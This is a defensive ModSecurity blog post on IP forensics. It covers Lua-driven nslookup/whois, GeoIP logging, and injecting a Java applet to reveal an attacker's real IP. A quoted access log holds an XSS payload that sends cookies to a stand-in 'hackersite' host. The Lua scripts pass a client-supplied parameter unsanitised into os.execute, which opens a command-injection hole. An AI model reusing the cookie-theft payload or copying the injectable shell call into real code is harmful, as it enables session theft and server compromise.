This week's installment of Detecting Malice with ModSecurity will discuss the value of obtaining data about client IP Addresses.
IP Forensic Section of Robert "Rsnake" Hansen's book "Detecting Malice" -
Whenever someone connects to your server you get their IP address. Technically speaking, this piece of information is very reliable--because of the three-way handshake, which I discussed in Chapter 1, an IP address used in a full TCP/IP connection typically cannot be spoofed. That may not matter much because, as this chapter will show, there are many ways for attackers to hide their tracks and connect to our servers not from their real IP addresses, but from addresses they will use as mere pawns in the game.
Almost the first thing people inquire into when they encounter computer crime is the location of the attacker. They want to know who the attacker is, where he is, and where he came from. These are all reasonable things to latch onto; but not always the first thing that comes to my mind.
I have a pretty particular way I like to think about IP addresses and forensics in particular. I am very practical. I want to find as much as I can, but only to the extent that whatever effort is spent toward uncovering the additional information is actually helpful. The goal of recording and knowing an offending IP address is to use it to determine intent of the attacker, and his motivation—is he politically, socially or monetarily motivated? Everything else comes at the end, and then only if you really need to catch the bad guy.
..snip..
Many attackers have failed to learn their lesson, either because of ignorance or stupidity and hack from their house. Although getting warrants for arrest can be time consuming, costly and difficult, it's still possible and if you can narrow down an attacker's IP address to a single location that will make the process much easier. Techniques such as reverse DNS resolution, WHOIS, and geolocation are commonly used to uncover useful real-world information on IP addresses.
Reverse DNS Resolution
One of the most useful tools in your arsenal can be to do a simple DNS resolution against the IP address of the attacker (retrieving the name associated with an IP address is known as reverse DNS resolution). Sometimes you can see the real name of the owner of the broadband provider.
WHOIS Database
Whois is a protocol that supports lookups against domain name, IP address and autonomous system number databases. If reverse DNS lookup provides little useful information, you can try running the whois command on the same IP address in order to retrieve the official owner information. You may get very interesting results. Sometimes it is possible to retrieve the actual name of the person or company at that IP address.
Gathering IP Data in ModSecurity
You can access and use the REMOTE_HOST variable in ModSecurity to log the client's registered DNS name. The problem is that this variable will only have data if Apache has been configured with HostnameLookups On. This is not the default as it will be a big performance hit to do nslookups on all clients. So, how can we gather client hostname information without incurring the overall performance hit?
Conditional Hostname Lookups in Lua
Lua to the rescue! If you use the following Lua script, you can conditionally execute an nslookup on the client IP address at the end of the transaction (in the logging phase) and log the data to the ModSecurity audit_log file only when the client's anomaly score is above your defined level. Here is an example line calling up the script:
SecRuleScript gather_ip_data.lua "phase:5,t:none,pass"
Here is the example code:
#!/opt/local/bin/lua require("io");
function main() anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none"); remote_addr = m.getvar("ARGS.REMOTE_ADDR", "none"); remote_hostname = "";
if anomaly_score ~= nil then n = os.tmpname () os.execute ("nslookup '" .. remote_addr .. "' > " .. n)
for line in io.lines (n) do if string.match(line, "name = ") then return("Remote Hostname is: " .. line .. "."); end end os.remove (n) end end
This will add a new message to the ModSecurity audit log like this:
Message: Warning. Remote Hostname is: 5.1.17.156.in-addr.arpa name = marcin.wcss.wroc.pl.. [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"]
Adding WHOIS Data
In addition to the Nslookup data, you could also easily add in WHOIS data such as the Abuse contact info:
#!/opt/local/bin/lua require("io"); function main() anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none"); m.log(4, "Anomaly Score is: " .. anomaly_score .. "."); remote_addr = m.getvar("ARGS.REMOTE_ADDR", "none"); m.log(4, "Remote IP is: " .. remote_addr .. "."); if anomaly_score ~= nil then n = os.tmpname () os.execute ("nslookup '" .. remote_addr .. "' > " .. n) os.execute ("whois '" .. remote_addr .. "' >> " .. n) for line in io.lines (n) do if string.match(line, "name = ") then hostname = line m.log(4, "Hostname is: " .. hostname .. "."); -- m.setvar("tx.hostname",'" .. hostname .. "'); end if string.match(line, "abuse") then abuse_contact = line m.log(4, "Abuse Contact is: " .. abuse_contact .. "."); -- m.setvar('tx.abuse_contact', abuse_contact); end end os.remove (n) return("Nslookup: " .. hostname .. " and WHOIS Abuse Info: " .. abuse_contact .. ""); end return nil; end
This would result in the following extra data:
Message: Nslookup: 5.1.17.156.in-addr.arpa name = marcin.wcss.wroc.pl. and WHOIS Abuse Info: remarks: abuse complaints to: abuse@wask.wroc.pl [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"]
Only Do DNS Lookups Once a Day
In order to keep the performance hit to a minimum, it will be possible (with the soon to be release ModSecurity v2.5.13) to do setvars from within Lua. This means that we can take our returned, resolved client hostname data and then save it off to an IP persistent collection that will expire after 24hrs. Here are the updated SecRules:
SecRuleScript gather_ip_data.lua "phase:5,t:none,pass,setvar:ip.hostname=%{tx.hostname},expirevar:ip.hostname=86400,skip:1" SecRule TX:ANOMALY_SCORE "@gt 5" "phase:5,t:none,pass,log,msg:'Client Hostname Resolution.',logdata:'%{ip.hostname}'"
So the logic is that if it is the first time that we are seeing this client, then the Lua script will handle doing the IP resolution and alerting/saving the hostname in the IP collection. If it is not the first time, then the Lua script does not do the Nslookup/WHOIS lookups. This data is instead taken from the saved IP collection data and logged in a new SecRule. And here is the updated Lua script:
#!/opt/local/bin/lua require("io"); function main() anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none"); remote_addr = m.getvar("ARGS.REMOTE_ADDR", "none"); ip_hostname = m.getvar("IP.HOSTNAME", "none"); if ((anomaly_score ~= nil) and (ip_hostname == nil)) then n = os.tmpname () os.execute ("nslookup '" .. remote_addr .. "' > " .. n) os.execute ("whois '" .. remote_addr .. "' >> " .. n) for line in io.lines (n) do if string.match(line, "name = ") then hostname = line m.log(4, "Hostname is: " .. hostname .. "."); m.setvar("tx.hostname", hostname); end if string.match(line, "abuse") then abuse_contact = line m.log(4, "Abuse Contact is: " .. abuse_contact .. "."); end end os.remove (n) return("Nslookup: " .. hostname .. " and WHOIS Abuse Info: " .. abuse_contact .. ""); end return nil; end
Don't Forget the GeoLocation Data
In last week's blog post, I highlighted how to use ModSecurity's GeoIP data for use in potential fraud detection scoring. In addition to fraud scoring, you can also use the GEO data in the same type of post-processing IP forensic data gathering. You can use the same logic where you check the overall anomaly score and if it is above a defined threshold, then you simply log the already gathered GEO data to the audit log file. Here is an example SecRule:
SecGeoLookupDb /usr/local/apache/conf/modsec_current/base_rules/GeoLiteCity.dat SecRule ARGS:remote_addr "@geoLookup" "phase:1,t:none,nolog,pass,setvar:ip.geo_country_code=%{geo.country_code}" SecRule TX:ANOMALY_SCORE "@gt 5" "phase:5,t:none,log,id:'1',severity:'5',msg:'Logging GeoIP Data due to high anomaly score.',logdata:'{country_code=%{geo.country_code}, country_code3=%{geo.country_code3}, country_name=%{geo.country_name}, country_continent=%{geo.country_continent}, city=%{geo.city}'"
The resulting ModSecurity message would contain the GeoIP data:
[Wed Nov 03 14:09:10 2010] [error] [client ::1] ModSecurity: Warning. Operator GT matched 5 at TX:anomaly_score. [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "40"] [id "1"] [msg "Logging GeoIP Data due to high anomaly score."] [data "{country_code=PL, country_code3=POL, country_name=Poland, country_continent=EU, city=Wroclaw"] [severity "NOTICE"] [hostname "localhost"] [uri "/cgi-bin/printenv"] [unique_id "TNGlRsCoAWcAAI5SGRMAAABA"]
Identifying Real IP Addresses of Web Attackers
One of the biggest challenges of doing incident response during web attacks is to try and trace back the source IP address information to identify the "real" attacker's computer. The reason why this is so challenging is that attackers almost always loop their attacks through numerous open proxy servers or other compromised hosts where they setup connection tunnels. This means that the actual IP address that shows up in the victims logs is most likely only the last hop in between the attacker and the target site. One way to try and tackle this problem is instead of relying on the TCP-IP address information of the connection, we attempt to handle this at the HTTP layer.
Web security researches (such as Jeremiah Grossman) have conducted quite a bit research in area of how blackhats can send malicious javascript/java to clients. Once the code executes, it can obtain the client's real (internal NAT) IP address. With this information, the javascript code can do all sorts of interesting stuff such as port scan the internal network. In our scenario, the client is not an innocent victim but instead a malicious client who is attacking our site. The idea is that this code that we send to the client will execute locally, grab their real IP address and then post the data back to a URL location on our site. With this data, we can then perhaps initiate a brand new incident response engagement focusing in on the actual origin of the attacks!
The following rule uses the same data as the previous example, except this time, instead of simply sending an alert pop-up box we are sending the MyAddress.class java applet. This code will force the attacker's browser to initiate a connection back to our web server.
SecRule TX:ALERT "@eq 1" "phase:3,nolog,pass,chain,prepend:'<APPLET CODE=\"MyAddress.class\" MAYSCRIPT WIDTH=0 HEIGHT=0> <PARAM NAME=\"URL\" VALUE=\"grab_ip.php?IP=\"> <PARAM NAME=\"ACTION\" VALUE=\"AUTO\"></APPLET>'" SecRule RESPONSE_CONTENT_TYPE "^text/html"
So, if an attacker sends a malicious request that ModSecurity triggers on, this rule will then fire and it will send the injected code to the client. Our Apache access_logs will show data similar to this:
203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20 src="http://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676 203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/grab_ip.php?IP=222.141.50.175 HTTP/1.1" 404 207
As you can see, even though the IP address in the access_logs shows 203.160.1.47, the data returned in the QUERY_STRING portion of the second line shows that the real IP address of the attacker is 222.141.50.175. This would mean that in this case, the attacker's system was not on a private network (perhaps just connecting their computer directly to the internet). In this case, you would be able to obtain the actual IP of an attacker who was conducting a manual attack with a browser.
Attacker -> Proxy -> ... -> Proxy -> Target Website. ^ ^ 222.141.50.175 203.160.1.47
This example is extremely experimental. As the previous section indicates, if the attacker were behind a router (on a private LAN) then the address range would have probably been in the 192.169.xxx.xxx range.
Attacker -> Firewall/Router -> ... -> Proxy -> Target Website. ^ ^ 192.168.1.100 203.160.1.47
This type of data would not be as useful for our purposes as it wouldn't help for a traceback.
Since a majority of web attacks are automated, odds are that the application that is sending the exploit payload is not actually a browser but rather some sort of scripting client. This would mean that the javascript/java code would not actually execute.
Hopefully this blog post has provided some examples that will help you to gather critical IP address data that may assist you with incident response tasks.